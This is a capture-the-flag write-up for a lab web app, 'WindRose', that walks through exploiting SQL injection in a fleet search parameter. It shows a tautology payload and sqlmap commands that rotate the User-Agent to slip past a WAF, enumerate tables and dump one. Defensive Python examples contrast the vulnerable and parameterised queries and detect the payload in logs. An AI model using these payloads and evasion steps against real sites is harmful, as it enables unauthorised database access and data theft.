WindRose


Room Description

WindRose — figure 1

https://dashboard.webverselabs-pro.com/events/windrose

Briefing

WindRose Jet Charter has been "boutique tailored aviation since 2009". Most of the site has aged well. The fleet browser, less so — it was wired up by a contractor named Hugh during the 2014 rebrand and never revisited. Hugh's email address still bounces.

Initial Analysis

We're back at it again for day 2 of the daily challenges on WebVerse. This time we have an aviation company to crack!

WindRose — figure 2

From the nav-bar we have the following endpoints:

<nav class="nav__links" aria-label="Primary">
      <div class="nav__item ">
        <a href="/about.php">About</a>
      </div>
      <div class="nav__item ">
        <a href="/safety.php">Safety</a>
      </div>
      <div class="nav__item ">
        <a href="/faqs.php">FAQs</a>
      </div>
      <div class="nav__item ">
        <a href="/services.php">Services<span class="dropdown__caret">▾</span></a>
        <div class="dropdown__panel" role="menu">
          <a href="/services.php#private">Private Travel</a>
          <a href="/services.php#corporate">Corporate Travel</a>
          <a href="/services.php#government">Government &amp; Defense</a>
          <a href="/services.php#entertainment">Sports &amp; Entertainment</a>
          <div class="dropdown__panel-divider"></div>
          <a href="/services.php#pricing">Pricing &amp; rates</a>
        </div>
      </div>
      <div class="nav__item ">
        <a href="/fleet.php">Fleet<span class="dropdown__caret">▾</span></a>
        <div class="dropdown__panel" role="menu">
          <a href="/fleet.php?q=light">Light Jets</a>
          <a href="/fleet.php?q=midsize">Midsize Jets</a>
          <a href="/fleet.php?q=challenger">Super-Midsize</a>
          <a href="/fleet.php?q=falcon">Heavy Jets</a>
          <a href="/fleet.php?q=global">Long Range</a>
          <a href="/fleet.php?q=g650">Ultra Long Range</a>
          <div class="dropdown__panel-divider"></div>
          <a href="/fleet.php">View entire fleet</a>
        </div>
      </div>
      <div class="nav__item">
        <a href="/about.php#bases">Bases<span class="dropdown__caret">▾</span></a>
        <div class="dropdown__panel" role="menu">
          <a href="/about.php#bases">KTEB · Teterboro</a>
          <a href="/about.php#bases">KSNA · John Wayne</a>
          <a href="/about.php#bases">KBOS · Boston Logan</a>
          <a href="/about.php#bases">KASE · Aspen</a>
          <a href="/about.php#bases">KAPA · Centennial</a>
          <a href="/about.php#bases">KAUS · Austin-Bergstrom</a>
        </div>
      </div>
      <div class="nav__item ">
        <a href="/contact.php">Contact</a>
      </div>
    </nav>

Finding the bug

/about.php

This is just an informational page with static content: a bunch of explanatory text about the company and nothing to interact with.

WindRose — figure 3

/safety.php

Same story as the About page: static text, plus a phone number for reporting safety concerns.

WindRose — figure 4

/faqs.php

There are so many questions here; this FAQ page seems more useful than the production-ready applications of major companies.

WindRose — figure 5

/services.php

There are four different types of services, but nothing to do here besides calling the phone number.

WindRose — figure 6

/fleet.php

All signs point to fleet.php. Here we can search aircraft, which makes it a perfect entry point for injection attacks. Hovering over Fleet gives us a drop-down list, but those entries are just pre-defined filters.

WindRose — figure 7

Light Jets is just ?q=light.

WindRose — figure 8
https://e25f701b-3970-windrose-82f48.events.webverselabs-pro.com/fleet.php?q=

We have control over the q parameter, so let's add a single quote and see if we get an error.

WindRose — figure 9

Alright, this doesn't tell us much yet: it could be that there are simply no matches, and the application doesn't surface SQL errors either. Let's add an always-true condition and see if every aircraft comes back; if so, we have a confirmed injection point.

' OR 1=1 --
WindRose — figure 10
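To show, from the defender's side, why the always-true condition above returns every row and how a parameterised query stops it, here is an added example (not WindRose's own code; the table name, column names and aircraft list are constructed assumptions) that rebuilds a minimal fleet search against SQLite, the backend the banner later reveals:

```python
import sqlite3

# Constructed sample standing in for WindRose's real fleet table (assumption: fleet.php
# filters a SQLite table by a category column that matches the q values in the nav).
SAMPLE_FLEET = [
    ("Citation CJ3", "light"),
    ("Phenom 300", "light"),
    ("Challenger 350", "challenger"),
    ("Falcon 7X", "falcon"),
    ("Global 6000", "global"),
    ("G650", "g650"),
]


def build_db():
    """Create an in-memory SQLite database with the constructed fleet rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE fleet (name TEXT, category TEXT)")
    conn.executemany("INSERT INTO fleet VALUES (?, ?)", SAMPLE_FLEET)
    return conn


def search_vulnerable(conn, q):
    """2014-style search: q is pasted straight into the SQL string.

    With q = "' OR 1=1 --" the statement becomes
    SELECT name FROM fleet WHERE category = '' OR 1=1 --'
    and the tautology plus the comment return every row.
    """
    sql = "SELECT name FROM fleet WHERE category = '" + q + "'"
    return [row[0] for row in conn.execute(sql)]


def search_fixed(conn, q):
    """Parameterised search: q is bound as data and is never parsed as SQL."""
    sql = "SELECT name FROM fleet WHERE category = ?"
    return [row[0] for row in conn.execute(sql, (q,))]


def engine_rejects_bare_quote(conn):
    """fleet.php showed nothing for a lone quote; the engine still rejects the
    broken statement, the page just swallows the error instead of showing it."""
    try:
        search_vulnerable(conn, "'")
        return False
    except sqlite3.OperationalError:
        return True
```

The same payload that dumps the whole table through the concatenated query matches zero rows through the bound parameter, because no category is literally named `' OR 1=1 --`.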

Exploitation

sqlmap -u "https://e715421f-3970-windrose-31036.events.webverselabs-pro.com/fleet.php?q=test" -p q --batch --technique=B --banner --risk 3 --level 5

Unfortunately, this won't get us any results: the website responds with "Access denied" and a 403 error when we run it just like this.

WindRose — figure 11

This means our sqlmap requests are being blocked by a WAF or some other protection in front of the web application. Let's add a really useful switch, --random-agent, which replaces sqlmap's default User-Agent header with a random browser one.

sqlmap -u "https://e715421f-3970-windrose-31036.events.webverselabs-pro.com/fleet.php?q=test" -p q --batch --technique=B --banner --risk 3 --level 5 --tables --dump --random-agent
WindRose — figure 12
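The 403 came from matching sqlmap's User-Agent, and a rotated UA walks straight past that rule. As an added example (not part of the original write-up; the access-log lines, IPs and the sqlmap UA string are constructed), here is a detector that flags the injection syntax in the q parameter itself, so the request is still caught after the User-Agent changes:

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed combined-format access-log lines. Line 2 carries sqlmap's default UA and
# was blocked; line 3 is the same client with a browser UA (what --random-agent does)
# and the page's own tautology payload, and it sailed through with a 200.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2025:10:01:02 +0000] "GET /fleet.php?q=light HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/125.0"
203.0.113.9 - - [10/Mar/2025:10:01:08 +0000] "GET /fleet.php?q=test%27%20AND%201%3D1 HTTP/1.1" 403 162 "-" "sqlmap/1.8#stable (https://sqlmap.org)"
203.0.113.9 - - [10/Mar/2025:10:01:15 +0000] "GET /fleet.php?q=test%27%20OR%201%3D1%20-- HTTP/1.1" 200 9870 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/124.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# q should only ever be a fleet category keyword, so a quote followed by a boolean
# tautology, or an SQL comment opener, is a strong signal regardless of the UA.
SQLI_RE = re.compile(r"(?i)(?:'|\")\s*(?:or|and)\s+\d+\s*=\s*\d+|--\s*$|/\*")


def classify(line):
    """Parse one log line; return its fields plus the list of reasons it is suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return None
    params = parse_qs(urlsplit(m["path"]).query, keep_blank_values=True)
    q = params.get("q", [""])[0]  # parse_qs already URL-decodes the value
    reasons = []
    if m["ua"].lower().startswith("sqlmap"):
        reasons.append("ua:sqlmap")          # the rule the WAF on the page relied on
    if SQLI_RE.search(q):
        reasons.append("payload:q")          # survives a rotated User-Agent
    return {"ip": m["ip"], "status": m["status"], "q": q, "reasons": reasons}


def detect(log_text):
    """Return the parsed records that tripped at least one rule."""
    parsed = (classify(line) for line in log_text.splitlines())
    return [r for r in parsed if r and r["reasons"]]
```

Run over the sample, the UA rule fires only on the blocked request, while the payload rule also catches the 200 response that the UA-only control missed.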

Now we can continue with enumerating the tables, dumping data and so on, because we have a confirmed way of automating this process; let's add --tables and --dump to our command.

WindRose — figure 13

Hm, we are having slight issues with information retrieval here; let's follow sqlmap's advice and add the --no-cast or --hex switch.

Unfortunately, that doesn't get us anywhere. I removed sqlmap's history and tried again, and I got different table names, so maybe we are messing something up along the way. I restarted the machine and tried again, this time running both sqlmap and ghauri side by side for sanity checks; we know from the banner that the backend is SQLite, and it can get funky.

Luckily, our previous command worked:

sqlmap -u "https://e25f701b-3970-windrose-82f48.events.webverselabs-pro.com/fleet.php?q=test" -p q --technique=B --batch --threads=1 --random-agent --tables --level 5 --risk 3
WindRose — figure 14

We have our table names; the experimental_jets table sounds a lot juicier than the other one.

So we need to craft our command to target that table specifically.

sqlmap -u "https://e25f701b-3970-windrose-82f48.events.webverselabs-pro.com/fleet.php?q=test" -p q --technique=B --batch --threads=1 --random-agent --tables --level 5 --risk 3 -T experimental_jets --dump
WindRose — figure 15